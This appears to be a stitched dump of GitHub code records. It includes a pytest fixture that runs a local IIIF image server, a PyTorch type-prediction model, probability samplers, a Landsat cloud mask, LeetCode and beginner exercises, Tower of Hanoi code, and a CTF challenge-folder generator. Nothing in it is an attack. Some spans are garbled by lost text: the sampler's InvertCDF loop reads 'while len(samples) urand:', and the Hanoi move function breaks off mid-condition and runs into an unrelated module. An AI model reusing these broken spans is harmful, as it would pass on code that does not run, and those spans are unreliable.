threading\nimport time\nimport requests\nimport glob\n\nfrom PIL import Image, ImageChops\n\nfrom pprint import pprint\n\nfrom requests import Response\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--cserver\", action=\"store\", default=\"notset\", help=\"The absolut path to the cserver executable\"\n )\n\n\n\n@pytest.fixture(scope=\"session\")\ndef manager(request):\n cserver_exe = request.config.getoption('--cserver')\n# cserver_handlerdir = request.config.getoption('--handlerdir')\n manager = CserverProcessManager(cserver_exe)\n manager.start_cserver()\n yield manager\n manager.stop_cserver()\n manager.cleanup()\n\n\nclass CserverProcessManager:\n iiif_port: str\n iiif_ssl_port: str\n iiif_url: str\n iiif_surl: str\n iiif_imgroot: str\n iiif_route: str\n iiif_validator_command: str\n\n def __init__(self, cserver_exe: str):\n \"\"\"\n Initialize the test environment\n\n :param cserver_exe: Path to the executable\n \"\"\"\n self.iiif_port = \"8080\"\n self.iiif_ssl_port = \"8443\"\n self.iiif_url = 'http://localhost:{}'.format(self.iiif_port)\n self.iiif_surl = 'https://localhost:{}'.format(self.iiif_ssl_port)\n self.iiif_imgroot = \"./iiiftestserver/imgroot\"\n self.iiif_route = \"iiif\"\n self.iiif_validator_command = \"iiif-validate.py -s localhost:{} -p {} -i 67352ccc-d1b0-11e1-89ae-279075081939.jp2 --version=3.0 -v\".format(\n self.iiif_port, self.iiif_route)\n self.cserver_logfile = os.path.abspath(\"cserver.log\")\n self.cserver_exe = cserver_exe\n self.cserver_config = {\n# \"CSERVE_HANDLERDIR\": cserver_handlerdir,\n \"CSERVE_PORT\": self.iiif_port,\n \"CSERVE_SSLPORT\": self.iiif_ssl_port,\n \"CSERVE_INITSCRIPT\": \"./iiiftestserver/config/iiif.init.lua\",\n \"CSERVE_SSLCERT\": './iiiftestserver/certificate/certificate.pem',\n \"CSERVE_SSLKEY\": './iiiftestserver/certificate/key.pem',\n \"CSERVE_JWTKEY\": 'UP4014, the biggest steam engine',\n \"CSERVE_TMPDIR\": \"./iiiftestserver/tmp\",\n \"CSERVE_LUA_INCLUDE_PATH\": \"./iiiftestserver/scripts\",\n \"CSERVE_NTHREADS\": \"6\",\n \"CSERVE_KEEPALIVE\": \"5\",\n \"CSERVE_MAXPOST\": \"12M\",\n \"CSERVE_LOGLEVEL\": \"TRACE\",\n \"SCRIPTHANDLER_SCRIPTDIR\": \"./iiiftestserver/scripts\",\n \"SCRIPTHANDLER_ROUTES\": \"GET:/misc:misc.lua;\",\n \"FILEHANDLER_DOCROOT\": \"./iiiftestserver/docroot\",\n \"FILEHANDLER_ROUTES\": \"GET:/fileserv:C++;\"\n \"PUT:/fileserv:C++;\"\n \"POST:/fileserv:C++\",\n \"PINGHANDLER_ECHO\": \"PINGPONG\",\n \"IIIFHANDLER_IMGROOT\": self.iiif_imgroot,\n \"IIIFHANDLER_ROUTES\": \"GET:/{}:C++;\"\n \"GET:/iiifhandlervariables:iiifhandlervariables.lua;\"\n \"GET:/test_exif_gps:test_exif_gps.lua;\"\n \"POST:/upload:upload.lua;\".format(self.iiif_route),\n \"IIIFHANDLER_PREFIX_AS_PATH\": \"true\",\n \"IIIFHANDLER_IIIF_SPECIALS\": \"testit=lua_testit\"\n }\n self.compare_command = \"compare -metric {} {} {} null:\"\n self.compare_out_re = re.compile(r\"^(\\d+) \\(([0-9.]+)\\).*$\")\n self.cserver_ready = False\n self.inlines = []\n #\n # remove all files in ./tmp\n #\n for root, dirs, files in os.walk('./iiiftestserver/tmp'):\n for f in files:\n os.unlink(os.path.join(root, f))\n for d in dirs:\n shutil.rmtree(os.path.join(root, d))\n\n def cleanup(self):\n \"\"\"Cleanup files generated by the tests\"\"\"\n fileList = glob.glob(self.iiif_imgroot + '/_*')\n for filePath in fileList:\n os.remove(filePath)\n\n def start_cserver(self):\n #\n # First we stop any existing Cserver process. 
This could happen if a previous test run crashed.\n        #\n        for proc in psutil.process_iter():\n            try:\n                if proc.name() == \"cserver\":\n                    proc.terminate()\n                    proc.wait()\n            except psutil.NoSuchProcess:\n                pass\n\n        # Remove any cserver log file from a previous run.\n        try:\n            os.remove(self.cserver_logfile)\n        except OSError:\n            pass\n\n        #\n        # let's start the subprocess with the cserver\n        #\n        self.cserver_process = subprocess.Popen(self.cserver_exe,\n                                                env=self.cserver_config,\n                                                stdout=subprocess.PIPE,\n                                                stderr=subprocess.STDOUT,\n                                                universal_newlines=True)\n\n        def get_output() -> None:\n            \"\"\"\n            This local function is used to collect the output from the subprocess.\n            :return: None\n            \"\"\"\n            while True:\n                line = self.cserver_process.stdout.readline().strip(\" \\n\\r\")\n                if line:\n                    print(line)\n                    if \"Cserver ready\" in line:\n                        self.cserver_ready = True\n                    self.inlines.append(line)\n                else:\n                    return\n        #\n        # start the thread collecting the output of the subprocess\n        #\n        self.thread = threading.Thread(target=get_output)\n        self.thread.daemon = True\n        self.thread.start()\n        #\n        # wait for Cserver to be ready...\n        #\n        cnt = 1\n        while not self.cserver_ready and cnt < 20:\n            time.sleep(0.2)\n            cnt += 1\n        if cnt >= 20:\n            raise CserverTestError(f\"Cserver did not start after {cnt*0.2} seconds\")\n        else:\n            print(f\"Cserver ready after {cnt*0.2} seconds\")\n\n    def stop_cserver(self) -> None:\n        \"\"\"\n        Stop the cserver\n        :return: None\n        \"\"\"\n        self.cserver_process.terminate()\n        self.cserver_ready = False\n        self.write_cserver_log()\n\n    def get_server_output(self) -> str:\n        return \"\".join(self.inlines)\n\n    def iiif_imgroot_path(self, relative_path: str) -> str:\n        \"\"\"\n        Converts a path relative to data-dir into an absolute path.\n        \"\"\"\n        return os.path.join(self.iiif_imgroot, relative_path)\n\n    def get_raw(self, *args, **kwargs) -> Response:\n        largs = list(args)\n        largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n        nargs = tuple(largs)\n        response = requests.get(*nargs, **kwargs)\n        return response\n\n    def get(self, *args, **kwargs):\n        largs = list(args)\n        largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n        nargs = tuple(largs)\n\n        response = \"\"\n        try:\n            response = requests.get(*nargs, **kwargs)\n            response.raise_for_status()\n        except:\n            raise CserverTestError(\"GET request to {} failed: {}\".format(nargs[0], response.json()[\"message\"]))\n        return response\n\n    def sget(self, *args, **kwargs):\n        largs = list(args)\n        largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n        nargs = tuple(largs)\n\n        response = \"\"\n        try:\n            response = requests.get(*nargs, **kwargs, verify=False)\n            response.raise_for_status()\n        except:\n            raise CserverTestError(\"GET request to {} failed: {}\".format(nargs[0], response.json()[\"message\"]))\n        return response\n\n    def get_json(self, *args, **kwargs):\n        largs = list(args)\n        largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n        nargs = tuple(largs)\n        try:\n            response = requests.get(*nargs, **kwargs)\n            response.raise_for_status()\n        except:\n            raise CserverTestError(\"GET request to {} failed: {}\".format(nargs[0], response.json()[\"message\"]))\n        return response.json()\n\n    def sget_json(self, *args, **kwargs):\n        largs = list(args)\n        largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n        nargs = tuple(largs)\n        try:\n            response = requests.get(*nargs, **kwargs, verify=False)\n            response.raise_for_status()\n        except:\n            raise CserverTestError(\"GET request to {} failed: {}\".format(nargs[0], response.json()[\"message\"]))\n        return 
response.json()\n\n def get_status_code(self, *args, **kwargs) -> int:\n largs = list(args)\n largs[0] = \"/\".join([self.iiif_url, self.iiif_route, largs[0]])\n nargs = tuple(largs)\n\n response = requests.get(*nargs, **kwargs)\n return response.status_code\n\n def get_route(self, route: str, headers: Dict[str,str] = None):\n route = 'http://localhost:8080/' + route\n response = requests.get(route, headers=headers)\n return response.status_code\n\n def get_route_json(self, route: str, headers: Dict[str,str] = None):\n route = 'http://localhost:8080/' + route\n try:\n response = requests.get(route, headers=headers)\n response.raise_for_status()\n except:\n raise CserverTestError(\"GET request to {} failed: {}\".format(route, response.json()[\"message\"]))\n return response.json()\n\n def download_file(self, iiifpath: str, suffix: str = None, headers=None) -> str:\n url = \"/\".join([self.iiif_url, self.iiif_route, iiifpath])\n response = requests.get(url, headers=headers, stream=True)\n response.raise_for_status()\n temp_fd, temp_file_path = tempfile.mkstemp(suffix=suffix)\n temp_file = os.fdopen(temp_fd, mode=\"wb\")\n\n for chunk in response.iter_content(chunk_size=8192):\n temp_file.write(chunk)\n\n temp_file.close()\n return temp_file_path\n\n def compare_iiif_bytes(self, iiifpath: str, referencepath: str, headers=None) -> bool:\n expected_file_basename, expected_file_extension = os.path.splitext(referencepath)\n downloaded_file_path = self.download_file(iiifpath, headers=headers, suffix=expected_file_extension)\n if filecmp.cmp(downloaded_file_path, referencepath):\n os.remove(downloaded_file_path)\n return True\n else:\n return False\n\n def compare_iiif_images(self, iiifpath: str, referencepath: str, headers=None) -> bool:\n expected_file_basename, expected_file_extension = os.path.splitext(referencepath)\n downloaded_file_path = self.download_file(iiifpath, headers=headers, suffix=expected_file_extension)\n\n im1 = Image.open(referencepath)\n im2 = Image.open(downloaded_file_path)\n diff = ImageChops.difference(im1, im2)\n if diff.getbbox():\n return False\n else:\n return True\n # compare_process_args = shlex.split(\n # self.compare_command.format(metric, referencepath, downloaded_file_path))\n # compare_process = subprocess.run(compare_process_args,\n # stdout=subprocess.PIPE,\n # stderr=subprocess.STDOUT,\n # universal_newlines=True)\n #\n #\n # compare_out_str = compare_process.stdout\n # compare_out_regex_match = self.compare_out_re.match(compare_out_str)\n # assert compare_out_regex_match is not None, \"Couldn't parse comparison result: {}\".format(compare_out_str)\n # return int(compare_out_regex_match.group(1))\n\n\n def upload(self, route: str, filepath: str, mimetype: str, data: Dict = None) -> Any:\n response = {}\n basename = os.path.basename(filepath)\n files = {'file': (basename, open(filepath, 'rb'), mimetype)}\n route = 'http://localhost:8080/' + route\n try:\n response = requests.post(route, data=data, files=files)\n response.raise_for_status()\n except:\n raise CserverTestError(\"POST request to {} failed: {}\".format(route, response.json()[\"message\"]))\n return response.json()\n\n def get_image_info(self, url_path, headers=None):\n \"\"\"\n Downloads a temporary image file, gets information about it using ImageMagick's 'identify'\n program with the '-verbose' option, and returns the resulting output.\n\n url_path: a path that will be appended to the Sipi base URL to make the request.\n headers: an optional dictionary of request headers.\n \"\"\"\n\n 
downloaded_file_path = self.download_file(url_path, headers=headers)\n info_process_args = shlex.split(\"identify -verbose {}\".format(downloaded_file_path))\n info_process = subprocess.run(info_process_args,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n return info_process.stdout\n\n def run_iiif_validator(self):\n \"\"\"Runs the IIIF validator. If validation fails, writes IIFHandler's output to cserve.log and raises an exception.\"\"\"\n\n validator_process_args = shlex.split(self.iiif_validator_command)\n validator_process = subprocess.run(validator_process_args,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n\n if validator_process.returncode != 0:\n raise CserverTestError(\n \"IIIF validation failed:\\n{}\".format(validator_process.stdout))\n\n\n def write_cserver_log(self) -> None:\n \"\"\"Writes cserver output to a log file.\"\"\"\n with open(self.cserver_logfile, \"w\") as file:\n file.write(self.get_server_output())\n\nclass CserverTestError(Exception):\n \"\"\"Indicates an error in a Sipi test.\"\"\"\n def __init__(self, *args):\n super(CserverTestError, self).__init__(args)\n\ndef pytest_itemcollected(item):\n \"\"\"Outputs test class and function docstrings, if provided, when each test is run.\"\"\"\n\n par = item.parent.obj\n node = item.obj\n pref = par.__doc__.strip() if par.__doc__ else par.__class__.__name__\n component = par.component\n suf = node.__doc__.strip() if node.__doc__ else node.__name__\n if pref or suf:\n item._nodeid = \"TEST: {}: {} should {}\\n\".format(pref, component, suf)\n","repo_name":"OMAS-IIIF/cserve","sub_path":"handlers/iiifhandler/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":14675,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24636858656","text":"class Integer:\n def __init__(self, value: int):\n self.value = value\n\n @staticmethod\n def convert_from_roman(num):\n roman_numerals = {'I': 1, 'V': 5, 'X': 10, 'L': 50, 'C': 100, 'D': 500, 'M': 1000}\n result = 0\n for i, c in enumerate(num):\n if (i + 1) == len(num) or roman_numerals[c] >= roman_numerals[num[i + 1]]:\n result += roman_numerals[c]\n else:\n result -= roman_numerals[c]\n return result\n\n @classmethod\n def from_float(cls, value):\n if not type(value) == float:\n return \"value is not a float\"\n return cls(int(value))\n\n @classmethod\n def from_roman(cls, value):\n return cls(cls.convert_from_roman(value))\n\n @classmethod\n def from_string(cls, value):\n if type(value) == str and value.isnumeric():\n return cls(int(value))\n return \"wrong type\"\n\n\nfirst_num = Integer(10)\nsecond_num = Integer.from_roman(\"IV\")\n\nprint(Integer.from_float(\"2.6\"))\nprint(Integer.from_string(2.6))\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Python_OOP/Class_and_Static_Methods/Integer.py","file_name":"Integer.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"40398488529","text":"import torch\nimport torch.nn as nn\n\nfrom ncc.models import NccLanguageModel, register_model\nfrom ncc.models.type_prediction.encoder import CodeEncoder, CodeEncoderLSTM\nfrom ncc.modules.decoders.ncc_decoder import NccDecoder\n\n\n@register_model('typetransformer')\nclass TypeTransformer(NccLanguageModel):\n def __init__(self, args, encoder):\n super().__init__(encoder)\n self.args = args\n\n # We follow BERT's random weight 
initialization\n        # self.apply(init_bert_params)\n\n        self.classification_heads = nn.ModuleDict()\n\n    @classmethod\n    def build_model(cls, args, config, task):\n        \"\"\"Build a new model instance.\"\"\"\n\n        # make sure all arguments are present\n        # base_architecture(args)\n\n        # if not hasattr(args, 'max_positions'):\n        if 'max_positions' not in args['model']:\n            args['model']['max_positions'] = args['task']['tokens_per_sample']\n\n        encoder = RobertaEncoder(args, task.source_dictionary, task.target_dictionary, encoder_type=args['model']['encoder_type'])\n        return cls(args, encoder)\n\n    def forward(self, src_tokens, **kwargs): #, features_only=False, return_all_hiddens=False, classification_head_name=None,\n        # if classification_head_name is not None:\n        #     features_only = True\n        #\n        # x, extra = self.decoder(src_tokens, features_only, return_all_hiddens, **kwargs)\n        #\n        # if classification_head_name is not None:\n        #     x = self.classification_heads[classification_head_name](x)\n        # return x, extra\n\n        x = self.decoder(src_tokens, **kwargs)\n\n        return x, None\n\n\nclass RobertaEncoder(NccDecoder):\n    def __init__(\n        self,\n        args,\n        source_dictionary,\n        target_dictionary,\n        # n_tokens,\n        # n_output_tokens,\n        d_model=512,\n        d_rep=128,\n        n_head=8,\n        n_encoder_layers=6,\n        d_ff=2048,\n        dropout=0.0, # 0.1\n        activation=\"relu\",\n        norm=True,\n        # pad_id=None,\n        encoder_type=\"transformer\"\n    ):\n        # super(TypeTransformer, self).__init__()\n        super().__init__(source_dictionary)\n        self.args = args\n        assert norm\n        # assert pad_id is not None\n        padding_idx = source_dictionary.pad()\n        self.config = {k: v for k, v in locals().items() if k != \"self\"}\n\n        # Encoder and output for type prediction\n        assert (encoder_type in [\"transformer\", \"lstm\"])\n        if encoder_type == \"transformer\":\n            self.encoder = CodeEncoder(\n                len(source_dictionary), d_model, d_rep, n_head, n_encoder_layers, d_ff, dropout, activation, norm, padding_idx, project=False\n            )\n            # TODO: Try LeakyReLU\n            self.output = nn.Sequential(nn.Linear(d_model, d_model), nn.ReLU(), nn.Linear(d_model, len(target_dictionary)))\n        elif encoder_type == \"lstm\":\n            self.encoder = CodeEncoderLSTM(\n                n_tokens=len(source_dictionary),\n                d_model=d_model,\n                d_rep=d_rep,\n                n_encoder_layers=n_encoder_layers,\n                dropout=dropout,\n                pad_id=padding_idx,\n                project=False\n            )\n            self.output = nn.Sequential(nn.Linear(d_model*2, d_model), nn.ReLU(), nn.Linear(d_model, len(target_dictionary)))\n\n    def forward(self, src_tokens, src_length=None, output_attention=None):\n        r\"\"\"\n        Arguments:\n            src_tok_ids: [B, L] long tensor\n            output_attention: [B, L, L] float tensor\n        \"\"\"\n        if output_attention is not None and src_tokens.size(0) != output_attention.size(0):\n            raise RuntimeError(\"the batch number of src_tok_ids and output_attention must be equal\")\n\n        # Encode\n        memory = self.encoder(src_tokens, src_length) # LxBxD\n        memory = memory.transpose(0, 1) # BxLxD\n\n        if output_attention is not None:\n            # Aggregate features to the starting token in each labeled identifier\n            memory = torch.matmul(output_attention, memory) # BxLxD\n\n        # Predict logits over types\n        return self.output(memory) # BxLxV\n","repo_name":"CGCL-codes/naturalcc","sub_path":"ncc/models/type_prediction/typetransformer.py","file_name":"typetransformer.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"72070796647","text":"# You are given two linked lists, list1 and list2, which contain n and m elements respectively. \n# \n# Remove the nodes of list1 from index a to index b, and attach list2 in their place. \n# \n# The blue edges and nodes in the figure below show the result of the operation: \n# \n# Return the head of the resulting linked list. \n# \n# \n# \n# Example 1: \n# \n# \n# \n# \n# Input: list1 = [0,1,2,3,4,5], a = 3, b = 4, list2 = [1000000,1000001,1000002]\n# Output: [0,1,2,1000000,1000001,1000002,5]\n# Explanation: We remove the two nodes of list1 at indices 3 and 4 and attach list2 in their place. The blue edges and nodes in the figure above form the answer list.\n# \n# \n# Example 2: \n# \n# \n# Input: list1 = [0,1,2,3,4,5,6], a = 2, b = 5, list2 = [1000000,1000001,1000002,1000003,1000004]\n# Output: [0,1,1000000,1000001,1000002,1000003,1000004,6]\n# Explanation: The blue edges and nodes in the figure above form the answer list.\n# \n# \n# \n# \n# Constraints: \n# \n# \n# 3 <= list1.length <= 10⁴ \n# 1 <= a <= b < list1.length - 1 \n# 1 <= list2.length <= 10⁴ \n# \n# \n# 👍 85 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def mergeInBetween(self, list1: ListNode, a: int, b: int, list2: ListNode) -> ListNode:\n        \"\"\"\n        Approach 1: traversal\n        \"\"\"\n        cur1, cur2 = list1, list2\n        while cur2.next:\n            cur2 = cur2.next\n\n        i = 0\n        while i != a-1:\n            cur1 = cur1.next\n            i += 1\n        cut_head = cur1\n\n        while i != b+1:\n            cur1 = cur1.next\n            i += 1\n        cut_tail = cur1\n\n        cut_head.next = list2\n        cur2.next = cut_tail\n\n        return list1\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[1669]合并两个链表.py","file_name":"[1669]合并两个链表.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73765820329","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 23 16:05:15 2020\r\n\r\n@author: MOHANA D\r\n\"\"\"\r\n\r\n\r\n#Write a program to check whether character is an alphabet or not using conditional operator.\r\nch = input(\"Please Enter Your Own Character : \")\r\n# isalpha() is built in function to check a character\r\nif(ch.isalpha()):\r\n    print(\"Given Character \", ch, \"is an Alphabet\")\r\nelse:\r\n    print(\"Given Character \", ch, \"is not an Alphabet\")","repo_name":"dasari-mohana-zz/Python_Assignments","sub_path":"charcod.py","file_name":"charcod.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19743181062","text":"import numpy as np\nfrom copy import deepcopy\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\n\ndef approx_cdf_1d(x_array, pdf_array):\n    \"\"\"\n\n    :param x_array: x-values of pdf\n    :param pdf_array: pdf array of given x-values\n    \"\"\"\n    norm_pdf = pdf_array / np.sum(pdf_array)\n    cdf_array = np.zeros_like(norm_pdf)\n    cdf_array[0] = norm_pdf[0]\n    for i in range(1, len(norm_pdf)):\n        cdf_array[i] = cdf_array[i - 1] + norm_pdf[i]\n    cdf_func = interp1d(x_array, cdf_array)\n    cdf_inv_func = interp1d(cdf_array, x_array)\n    return cdf_array, cdf_func, cdf_inv_func\n\nclass ProbabilityDistribution(object):\n\n\n    def __init__(self,distribution_type='',args={},Nsamples=int,decimals=int,**kwargs):\n\n        self.decimals = decimals\n\n        if distribution_type=='Uniform':\n            self.draw = self.Uniform\n            self.low,self.high = args['low'],args['high']\n\n        elif distribution_type=='LogUniform':\n            self.draw = self.LogUniform\n            self.low,self.high = args['low'],args['high']\n\n        elif distribution_type=='Gaussian':\n            self.draw = self.Gaussian\n            self.mean,self.sigma = args['mean'],args['sigma']\n            self.positive_definite = args['positive_definite']\n\n        elif distribution_type=='PDF':\n\n            self.draw = 
self.InvertCDF\n\n sorted = np.argsort(args['values'])\n args['values'] = np.array(args['values'])\n args['pdf'] = np.array(args['pdf'])\n values = args['values'][sorted]\n pdf = args['pdf'][sorted]\n norm = np.max(pdf)\n\n self.values, self.pdf = values, pdf/norm\n\n else:\n raise Exception('distribution_type not recognized: ')\n\n if 'sort_ascending' in args:\n self.sort_ascending = True\n else:\n self.sort_ascending = False\n\n def InvertCDF(self, N):\n\n zmin, zmax = self.values[0], self.values[-1]\n\n pz = interp1d(self.values, self.pdf)\n samples = []\n while len(samples) urand:\n samples.append(zprop)\n\n return np.round(samples, self.decimals)\n\n def LogUniform(self, N):\n\n logsamples = np.random.uniform(self.low, self.high, N)\n if self.sort_ascending:\n logsamples = logsamples[np.argsort(logsamples)]\n\n samples = 10**logsamples\n\n return np.round(np.array(samples), self.decimals)\n\n def Uniform(self,N):\n\n samples = np.random.uniform(self.low,self.high,N)\n\n if self.sort_ascending:\n samples = samples[np.argsort(samples)]\n\n return np.round(np.array(samples),self.decimals)\n\n\n def Gaussian(self,N):\n\n samples = np.random.normal(self.mean,self.sigma,N)\n\n if self.positive_definite:\n samples = np.absolute(samples)\n\n if self.sort_ascending:\n samples = samples[np.argsort(samples)]\n\n return np.round(np.array(samples),self.decimals)\n\n","repo_name":"dangilman/MagniPy","sub_path":"MagniPy/ABCsampler/probability_distributions.py","file_name":"probability_distributions.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43087764964","text":"import ee\n\n\ndef landsat_bqa_cloud_mask_func(img):\n \"\"\"Extract Landsat Collection 1 cloud mask from the BQA band\n\n Parameters\n ----------\n img : ee.Image\n\n Returns\n -------\n ee.Image\n\n Notes\n -----\n Output image is structured to be applied directly with updateMask()\n i.e. 
0 is cloud, 1 is cloud free\n\n https://landsat.usgs.gov/collectionqualityband\n https://code.earthengine.google.com/356a3580096cca315785d0859459abbd\n\n Confidence values\n 00 = \"Not Determined\" = Algorithm did not determine the status of this condition\n 01 = \"No\" = Algorithm has low to no confidence that this condition exists (0-33 percent confidence)\n 10 = \"Maybe\" = Algorithm has medium confidence that this condition exists (34-66 percent confidence)\n 11 = \"Yes\" = Algorithm has high confidence that this condition exists (67-100 percent confidence\n\n \"\"\"\n qa_img = ee.Image(img.select(['BQA']))\n\n # Extracting cloud masks from BQA using rightShift() and bitwiseAnd()\n # Cloud (med & high confidence), then snow, then shadow, then fill\n # Low confidence clouds tend to be the FMask buffer\n cloud_mask = qa_img.rightShift(4).bitwiseAnd(1).neq(0) \\\n .And(qa_img.rightShift(5).bitwiseAnd(3).gte(2)) \\\n .Or(qa_img.rightShift(7).bitwiseAnd(3).gte(3)) \\\n .Or(qa_img.rightShift(9).bitwiseAnd(3).gte(3)) \\\n .Or(qa_img.rightShift(11).bitwiseAnd(3).gte(3))\n\n return cloud_mask.Not()\n","repo_name":"pblankenau2/openet-core-beta","sub_path":"openet/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40446123087","text":"#*****************************************************\n#\n#Program Author: Frances Zhao\n#Completion Date: April 26th 2021\n#Program Name: Lesson 2_1\n#Description: prompting the user for the height and base length of a right angle triangle\n#Outputting the area of the triangle\n#\n#*****************************************************\n\n#variable declaration\nheight = float()\nbase = float()\n\n#prompting the user for the height and base of the triangle\nheight = float(input(\"Welcome to the right triangle area finder! 
Please enter the height of the triangle: \"))\nbase = float(input(\"Please enter the base length of the triangle: \"))\n\n#conversion rule to find area of triangle\narea = base * height / 2\n\n#outputting the area of the right angle triangle\nprint(\"The area of your triangle is \", area, \" units squared.\" )","repo_name":"frances-zhao/ICS207","sub_path":"homework/lesson 2/Lesson2_1.py","file_name":"Lesson2_1.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5248274774","text":"import sys;\ndef hanoiRecursive(disk,src,dest,aux):\n if len(src)==0 or disk<=0:\n return\n hanoiRecursive(disk-1,src,aux,dest)\n top = src.pop();dest.append(top)\n print(\"src :{} aux:{} dest:{}\".format(src,aux,dest))\n hanoiRecursive(disk-1,aux,dest,src)\n \ndef hanoiIterative(disk,src,dest,aux):\n totalmoves=(2**disk)-1;\n print(\"Total Moves : {}\".format(totalmoves))\n even=False\n if disk%2==0:\n temp=aux;\n aux=dest;\n dest=temp\n even=True\n mov=\"\"\n for i in range(1,totalmoves+1):\n if i%3 == 0:\n sit,top=move(aux,dest)\n if sit==1:\n mov=(\"Move {} from aux to dest\".format(top),\"Move {} from dest to aux\".format(top))[even]\n else:\n mov=(\"Move {} from dest to aux\".format(top),\"Move {} from aux to dest\".format(top))[even]\n if i%3 == 1:\n sit,top=move(src,dest)\n if sit==1:\n mov=(\"Move {} from src to dest\".format(top),\"Move {} from aux to src\".format(top))[even]\n else:\n mov=(\"Move {} from dest to src\".format(top),\"Move {} from src to aux\".format(top))[even]\n if i%3 == 2:\n sit,top=move(aux,src)\n if sit==1:\n mov=(\"Move {} from aux to src\".format(top),\"Move {} from dest to src\".format(top))[even]\n else:\n mov=(\"Move {} from src to aux\".format(top),\"Move {} from srx to dest\".format(top))[even]\n print(mov)\n\ndef move(pole1,pole2):\n if len(pole2)==0:\n temp=pole1.pop()\n pole2.append(temp)\n return (1,temp)\n elif len(pole1)==0:\n temp=pole2.pop()\n pole1.append(temp)\n return (2,temp)\n elif pole1[-1]\n├── dist\n│ └── \n├── service\n│ └── \n│ ├── dockerfile\n│ └── \n├── solution\n│ ├── writeup.md\n│ └── \n├── chall.yaml\n└── README.md\n\"\"\"\n\nfrom __future__ import annotations\n\nimport shutil\nfrom pathlib import Path\nfrom typing import TypedDict\n\nfrom yaml import safe_dump\n\nfrom ctf_architect.core.models import ChallengeInfo, Flag, Hint, Service\n\n\nclass ServiceDict(TypedDict):\n name: str\n path: str\n port: int\n\n\nREADME_TEMPLATE = \"\"\"# {name}\n{description}\n\n## Summary\n- **Author:** {author}\n- **Discord Username:** {discord}\n- **Category:** {category}\n- **Difficulty:** {difficulty}\n\n## Hints\n{hints}\n\n## Files\n{files}\n\n## Services\n{services}\n\n## Flags\n{flags}\n\"\"\"\n\n\ndef create_challenge_readme(info: ChallengeInfo) -> str:\n \"\"\"\n Creates a README.md file for a challenge.\n \"\"\"\n flags = \"\\n\".join([\n f\"- `{flag.flag}` ({'regex' if flag.regex else 'static'})\"\n for flag in info.flags\n ])\n \n if info.hints is None:\n hints = \"None\"\n else:\n hints = \"\\n\".join([f\"- `{hint.description}` ({hint.cost} points)\" for hint in info.hints])\n \n if info.files is None:\n files = \"None\"\n else:\n files = \"\"\n for file in info.files:\n path = Path(file)\n files += f\"- [`{path.name}`]({path})\\n\"\n \n if info.services is None:\n services = \"None\"\n else:\n services = \"\"\n for service in info.services:\n services += f\"- [`{service.name}`]({service.path}) (port {service.port})\\n\"\n \n return 
README_TEMPLATE.format(\n name=info.name,\n description=info.description,\n author=info.author,\n discord=info.discord,\n category=info.category,\n difficulty=info.difficulty,\n hints=hints,\n files=files,\n services=services,\n flags=flags\n )\n\n\ndef create_challenge_folder(name: str, dist: bool = False, service: bool = False) -> Path:\n \"\"\"\n Creates a folder with the challenge template.\n \"\"\"\n challenge_path = Path(name)\n challenge_path.mkdir(exist_ok=True)\n\n if dist:\n (challenge_path / \"dist\").mkdir(exist_ok=True)\n\n if service:\n (challenge_path / \"service\").mkdir(exist_ok=True)\n\n (challenge_path / \"solution\").mkdir(exist_ok=True)\n\n # Create empty files\n (challenge_path / \"chall.yaml\").touch()\n (challenge_path / \"README.md\").touch()\n\n return challenge_path\n\n\n\ndef create_challenge(\n name: str,\n description: str,\n difficulty: str,\n category: str,\n author: str,\n discord: str,\n solution_files: list[Path],\n flag: str = None,\n flags: list[dict[str, str | bool]] = None,\n hints: dict[str, str | int] = None,\n files: list[Path] = None,\n requirements: list[str] = None,\n services: list[ServiceDict] = None\n) -> Path:\n \"\"\"\n Creates a folder with the challenge template.\n\n Parameters\n ----------\n name : str\n The name of the challenge.\n description : str\n The description of the challenge.\n difficulty : str\n The difficulty of the challenge.\n category : str\n The category of the challenge.\n author : str\n The author of the challenge.\n discord : str\n The discord of the author.\n flag : str, optional\n The flag of the challenge.\n flags : list[dict[str, str | bool]], optional\n The flags of the challenge.\n hints : dict[str, str | int], optional\n The hints of the challenge.\n files : list[Path], optional\n Paths to the files that should be given to participants\n requirements : list[str], optional\n The requirements of the challenge.\n services : list[ServiceDict], optional\n The services of the challenge.\n\n Returns\n -------\n Path\n The path to the challenge folder.\n \"\"\"\n\n if flag is None and flags is None:\n raise ValueError(\"Must specify either flag or flags\")\n elif flag is not None and flags is not None:\n raise ValueError(\"Cannot 